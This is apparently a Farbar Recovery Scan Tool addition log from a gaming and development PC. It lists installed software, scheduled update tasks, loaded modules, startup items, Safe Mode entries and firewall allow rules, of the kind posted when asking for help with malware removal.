Oculus Display Driver (Install Only) (HKLM\...\{2C48475F-F6AA-48BC-827E-67C21685BE65}) (Version: 1.2.2.0 - Oculus VR, LLC)
Oculus Positional Tracker Driver (Install Only) (HKLM\...\{53CBAB0B-4713-4743-B62F-325ED1B6869F}) (Version: 0.0.1.7 - Oculus VR, LLC)
Oculus Runtime (HKLM-x32\...\Oculus Runtime 0.4.4 Rev 1) (Version: 0.4.4 Rev 1 - Oculus VR, LLC)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.4.22.2815 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
Papers, Please (HKLM-x32\...\Steam App 239030) (Version:  - 3909)
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Daybreak Games)
PlanetSide 2 (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\DG0-PlanetSide 2) (Version:  - Sony Online Entertainment)
Play withSIX Windows client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\PlaywithSIX) (Version: 1.68.1172.2 - SIX Networks GmbH)
PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7083 - Realtek Semiconductor Corp.)
Remote Mouse version 3.000 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 3.000 - Remote Mouse)
Renegade X (HKLM\...\UDK-) (Version:  - Totem Arts)
RivaTuner Statistics Server 6.1.0 (HKLM-x32\...\RTSS) (Version: 6.1.0 - Unwinder)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.9.6 - Rockstar Games)
Roslyn Language Services - x86 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.2300.0 - SAMSUNG Electronics Co., Ltd.)
Service Pack 1 for SQL Server 2008 (KB968369) (64-bit) (HKLM\...\KB968369) (Version: 10.1.2531.0 - Microsoft Corporation)
ShadowCopy (HKLM-x32\...\{117CE366-3EED-48C5-BF6A-E0F47A0E68A4}) (Version: 2.02.000 - Runtime Software)
Skype™ 7.14 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.14.106 - Skype Technologies S.A.)
Snaz version 1.12.4.0 (HKLM-x32\...\{70A76031-FDC6-4F9B-BB5C-33776703F45A}_is1) (Version: 1.12.4.0 - JimsApps)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.5 - Sophos Limited)
Sound Blaster X-Fi (HKLM-x32\...\{18F11181-EA1A-42AE-AF89-4867C7F7A6FA}) (Version: 1.0 - )
Source SDK (HKLM-x32\...\Steam App 211) (Version:  - Valve)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
SPEEDLINK PHANTOM HAWK Flightstick (HKLM-x32\...\{762C7640-64D8-4A0F-9A53-29EA560914AB}) (Version: v3.61a - lsw)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1) (Version: 1.6.2 - Safer Networking Limited)
Spyder2express (HKLM-x32\...\Spyder2express) (Version:  - )
Sql Server Customer Experience Improvement Program (Version: 10.1.2531.0 - Microsoft Corporation) Hidden
Starbound - Unstable (HKLM-x32\...\Steam App 367540) (Version:  - )
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
SteamVR (HKLM-x32\...\Steam App 250820) (Version:  - )
Strong Bad Episode 2: Strong Badia the Free (HKLM\...\Steam App 8350) (Version:  - Telltale Games)
Team Explorer for Microsoft Visual Studio 2015 (x32 Version: 14.0.23102 - Microsoft Corporation) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.13.104.1010 - Electronic Arts Inc.)
ThuumicShouter version 1.94.2 Open Beta (HKLM-x32\...\{C9C550CB-2390-410E-883F-3BE147D64143}_is1) (Version: 1.94.2 Open Beta - DeadlyHamster)
Trillian (HKLM-x32\...\Trillian) (Version:  - Cerulean Studios, LLC)
uLink (HKLM-x32\...\uLink) (Version: 1.5.8 Lina (2014-03-13) - MuchDifferent)
Undertale (HKLM-x32\...\Steam App 391540) (Version:  - tobyfox)
Unity (HKLM-x32\...\Unity) (Version: 5.4.0f3 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\UnityWebPlayer) (Version: 5.3.5f1 - Unity Technologies ApS)
Vimicro USB2.0 UVC PC Camera (HKLM-x32\...\{71A51A91-E7D3-11DB-A386-005056C00008}) (Version: 2009.03.18 - Vimicro Corp.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF RIA Services V1.0 SP1 (HKLM-x32\...\{D9E6001A-5DC3-4620-AF7A-80B6CD48645D}) (Version: 4.1.60114.0 - Microsoft Corporation)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
WebM Project Directshow Filters (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\webmdshow) (Version:  - )
WhoCrashed 5.03 (HKLM\...\WhoCrashed_is1) (Version:  - Resplendence Software Projects Sp.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\WinDirStat) (Version:  - )
Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Speech Recognition Macros (HKLM-x32\...\{8DC197D6-F4AB-44E0-ACF7-210355E6F389}) (Version: 1.0.6862.19 - Microsoft Corporation)
WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
World Machine 2 Professional Edition (HKLM-x32\...\World Machine2Pro) (Version:  - )
x264vfw - H.264/MPEG-4 AVC codec (remove only) (HKLM-x32\...\x264vfw) (Version:  - )
x264vfw - H.264/MPEG-4 AVC codec for x64 (remove only) (HKLM-x32\...\x264vfw64) (Version:  - )
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
ZoneAlarm Antivirus (x32 Version: 11.0.768.000 - Check Point Software Technologies Ltd.) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1771700083-1338792134-2885675772-1001_Classes\CLSID\{D45F043D-F17F-4e8a-8435-70971D9FA46D}\InprocServer32 -> C:\Program Files\Blender Foundation\Blender\BlendThumb64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1EAB7A46-62C8-4079-B5C1-746FC987684A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {7536A8CB-5435-4FD2-8A49-154A24611285} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-04-07] (Dropbox, Inc.)
Task: {8C1E609C-643B-44E0-9C36-0CBEDF5BACE5} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-04-07] (Dropbox, Inc.)
Task: {8CEE459F-7B07-47BA-A871-8641D83863D4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {B3975A72-DCDB-4759-8749-9B22F24DC442} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-08-01] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-12-11 18:13 - 2015-11-24 11:40 - 00116344 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2015-02-02 20:10 - 2014-12-03 14:17 - 00231952 _____ () C:\Program Files (x86)\Oculus\Service\OVRServiceLauncher.exe
2015-01-03 19:20 - 2015-12-10 01:36 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2014-05-12 02:49 - 2014-05-12 02:49 - 00222720 _____ () D:\Program Files (x86)\Notepad++\NppShell_06.dll
2015-02-02 20:10 - 2014-12-03 14:17 - 01176592 _____ () C:\Program Files (x86)\Oculus\Service\OVRServer_x64.exe
2015-03-06 17:07 - 2015-03-06 17:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-09-19 14:20 - 2015-09-19 14:20 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-06 17:07 - 2015-03-06 17:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-09-19 14:20 - 2015-09-19 14:20 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2014-11-01 22:25 - 2013-07-13 17:21 - 07922176 _____ () C:\Users\King\Downloads\cpk_05\CPKeeper.exe
2016-04-07 22:01 - 2016-09-21 18:44 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-10-13 14:55 - 2016-09-21 18:44 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-10-13 14:55 - 2016-09-21 18:45 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-10-13 14:55 - 2016-09-21 18:44 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-04-07 22:01 - 2016-09-21 18:44 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-04-07 22:01 - 2016-09-21 18:44 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-04-07 22:01 - 2016-09-21 18:44 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-04-07 22:01 - 2016-09-21 18:45 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-10-13 14:55 - 2016-09-21 18:44 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-10-13 14:55 - 2016-09-21 18:46 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-05 12:43 - 2016-09-21 18:45 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-04-07 22:01 - 2016-09-21 18:46 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-04-07 22:01 - 2016-10-10 11:35 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-10-13 14:55 - 2016-09-21 18:42 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-10-13 14:55 - 2016-10-10 11:35 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-10-13 14:55 - 2016-10-10 11:35 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-04-07 22:01 - 2016-09-21 18:45 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-10-13 14:55 - 2016-09-21 18:49 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-10-13 14:55 - 2016-09-21 18:49 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-04-07 22:01 - 2016-09-21 18:46 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-08-05 12:43 - 2016-10-10 11:35 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-10-13 14:55 - 2016-10-10 11:35 - 00168760 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2014-03-01 01:20 - 2014-03-01 01:20 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL
2014-05-09 20:35 - 2009-03-26 14:46 - 00148480 _____ () C:\Windows\SysWOW64\APOMngr.DLL
2015-05-27 00:00 - 2015-05-27 00:00 - 00059904 _____ () D:\Program Files (x86)\Trillian\zlib1.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00187392 _____ () D:\Program Files (x86)\Trillian\libpng15.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00006656 _____ () d:\program files (x86)\trillian\languages\en\trillian.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00065536 _____ () D:\Program Files (x86)\Trillian\libungif.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00003584 _____ () d:\program files (x86)\trillian\languages\en\toolkit.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00006656 _____ () d:\program files (x86)\trillian\languages\en\events.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00010752 _____ () d:\program files (x86)\trillian\languages\en\buddy.dll
2015-05-27 00:00 - 2015-05-27 00:00 - 00007168 _____ () d:\program files (x86)\trillian\languages\en\talk.dll
2016-10-03 14:19 - 2016-09-24 20:47 - 01805416 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libglesv2.dll
2016-10-03 14:19 - 2016-09-24 20:47 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libegl.dll
2016-02-17 23:01 - 2016-09-07 20:14 - 00784672 _____ () D:\Program Files (x86)\Steam\SDL2.dll
2016-02-17 23:01 - 2016-08-31 18:02 - 04969248 _____ () D:\Program Files (x86)\Steam\v8.dll
2016-02-17 23:01 - 2016-08-31 18:02 - 01563936 _____ () D:\Program Files (x86)\Steam\icui18n.dll
2016-02-17 23:01 - 2016-08-31 18:02 - 01195296 _____ () D:\Program Files (x86)\Steam\icuuc.dll
2016-02-17 23:01 - 2016-10-12 18:58 - 02321696 _____ () D:\Program Files (x86)\Steam\video.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 02549760 _____ () D:\Program Files (x86)\Steam\libavcodec-56.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00442880 _____ () D:\Program Files (x86)\Steam\libavutil-54.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00491008 _____ () D:\Program Files (x86)\Steam\libavformat-56.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00332800 _____ () D:\Program Files (x86)\Steam\libavresample-2.dll
2016-02-17 23:01 - 2016-01-27 00:49 - 00485888 _____ () D:\Program Files (x86)\Steam\libswscale-3.dll
2016-02-17 23:01 - 2016-10-12 18:58 - 00836896 _____ () D:\Program Files (x86)\steam\bin\chromehtml.DLL
2016-03-08 17:48 - 2016-07-04 15:17 - 00266560 _____ () D:\Program Files (x86)\Steam\openvr_api.dll
2016-10-13 22:43 - 2016-08-04 13:56 - 49825056 _____ () D:\Program Files (x86)\steam\bin\cef\cef.winxp\libcef.dll
2016-02-17 23:01 - 2015-09-24 16:52 - 00119208 _____ () D:\Program Files (x86)\Steam\winh264.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\scriptsBackup.zip:com.dropbox.attributes [168]
AlternateDataStreams: C:\Users\King\Desktop\mechGame.zip:com.dropbox.attributes [168]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PAexec => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PAexec => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

There are 7915 more sites.

There are 7915 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-10-16 21:24 - 2016-10-19 16:52 - 00452470 ____R C:\Windows\system32\Drivers\etc\hosts

There are 15553 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\King\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: nlsvc => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: RemoteMouseService => 2
MSCONFIG\Services: SBSDWSCService => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ColorVisionStartup.lnk => C:\Windows\pss\ColorVisionStartup.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: BrStsWnd => C:\Program Files (x86)\Brownie\BrstsW64.exe Autorun
MSCONFIG\startupreg: DAEMON Tools Lite => "D:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: Dxtory Update Checker 2.0 => D:\Program Files (x86)\ExKode\Dxtory2.0\UpdateChecker.exe
MSCONFIG\startupreg: JMB36X IDE Setup => C:\Windows\RaidTool\xInsIDE.exe
MSCONFIG\startupreg: NUSB3MON => "C:\Program Files (x86)\NEC Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: UpdReg => C:\Windows\UpdReg.EXE

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{2D648D5F-45BB-40E6-A13C-75F27A86F884}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{DD32B9A1-1715-4303-AF22-2B0CEFB90996}] => (Allow) D:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{36E2D361-3803-4699-8C6E-6D1B1E29A408}D:\downloads\withsix-play(1).exe] => (Allow) D:\downloads\withsix-play(1).exe
FirewallRules: [UDP Query User{B3EFC1B5-A17C-40FE-8D34-939EBF24F839}D:\downloads\withsix-play(1).exe] => (Allow) D:\downloads\withsix-play(1).exe
FirewallRules: [{39512476-EAC8-43EF-BF07-F0DB15C5028E}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA.exe
FirewallRules: [{D51686D4-225F-4565-A409-DB142E45C975}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ARMA 2 Operation Arrowhead\ArmA2OA.exe
FirewallRules: [TCP Query User{125B86B4-2480-4762-BF1C-B2A3C1AF69C0}D:\dayz\beta_oa\arma2oa.exe] => (Allow) D:\dayz\beta_oa\arma2oa.exe
FirewallRules: [UDP Query User{3B560AB4-A4C1-49C6-9635-FC0F37ECFE39}D:\dayz\beta_oa\arma2oa.exe] => (Allow) D:\dayz\beta_oa\arma2oa.exe
FirewallRules: [{36ADBDB5-623D-4991-89BA-841B9F7A6D84}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [{3D52C5CC-0DE2-4A03-9D6F-61A681B52C68}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [TCP Query User{D4E76E74-895A-49FE-A7CB-5E3F072A5CF3}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{75420C43-0E6C-42B6-A2CE-4C5A214CB7F0}D:\program files (x86)\mirc\mirc.exe] => (Allow) D:\program files (x86)\mirc\mirc.exe
FirewallRules: [{DEF7ACD5-6B29-4563-AF03-20544D8B06DE}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\team fortress 2\hl2.exe
FirewallRules: [{D51E4E29-AEDB-4B45-88B8-3E0133F9092D}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\team fortress 2\hl2.exe
FirewallRules: [TCP Query User{BAF3E577-5B34-48AF-82EE-9C94AD5AAC79}D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe] => (Allow) D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe
FirewallRules: [UDP Query User{90177174-4A00-4377-89D3-2AE624A20F1E}D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe] => (Allow) D:\files\backup\d drive\cryengine_pc_v3_4_5_6666_freesdk\bin64\editor.exe
FirewallRules: [TCP Query User{726C2C70-FAD9-4064-A65A-B3AD6F20D160}D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe] => (Allow) D:\cryengine_build_pc_v3_5_8_2310_freesdk\bin64\editor.exe
